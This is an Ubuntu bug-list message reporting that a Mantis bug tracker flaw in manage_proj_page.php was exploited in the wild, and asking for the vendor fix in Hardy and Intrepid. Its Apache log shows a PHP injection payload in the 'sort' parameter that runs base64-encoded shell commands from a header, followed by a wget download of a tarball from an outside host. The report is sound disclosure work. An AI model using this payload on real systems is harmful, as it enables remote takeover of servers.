[Bug 345988] Re: security issues with manage_proj_page.php
Christian Schulze
lynx at quantentunnel.de
Mon Apr 6 13:11:28 UTC 2009
This bug has been actively exploited on a hardy machine running mantis 1.0.6 on feb 4th 2009, as it was noticed today.
Because of the LTS for hardy the vendor patch should be applied here too.
<APACHE LOG>
IP - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3350 "-" "-"
IP - - [04/Feb/2009:19:32:53 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3218 "-" "-"
IP - - [04/Feb/2009:19:33:01 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3605 "-" "-"
IP - - [04/Feb/2009:19:33:19 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3809 "-" "-"
--19:33:01-- http://www.freewebs.com/spaniola/new.tgz
=> `new.tgz'
Resolving www.freewebs.com... 204.2.183.2
Connecting to www.freewebs.com|204.2.183.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248,497 (243K) [application/x-tar]
0K .......... .......... .......... .......... .......... 20% 58.65 KB/s
50K .......... .......... .......... .......... .......... 41% 58.78 KB/s
100K .......... .......... .......... .......... .......... 61% 51.43 KB/s
150K .......... .......... .......... .......... .......... 82% 43.37 KB/s
200K .......... .......... .......... .......... .. 100% 45.68 KB/s
19:33:07 (50.96 KB/s) - `new.tgz' saved [248497/248497]
</APACHE LOG>
The problem seems to be fixed in version 1.1.4.
Intrepid is shipping 1.1.2. Has the vendor patch been applied to that version?
--
security issues with manage_proj_page.php
https://bugs.launchpad.net/bugs/345988
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
--
ubuntu-bugs mailing list
ubuntu-bugs at lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
More information about the universe-bugs
mailing list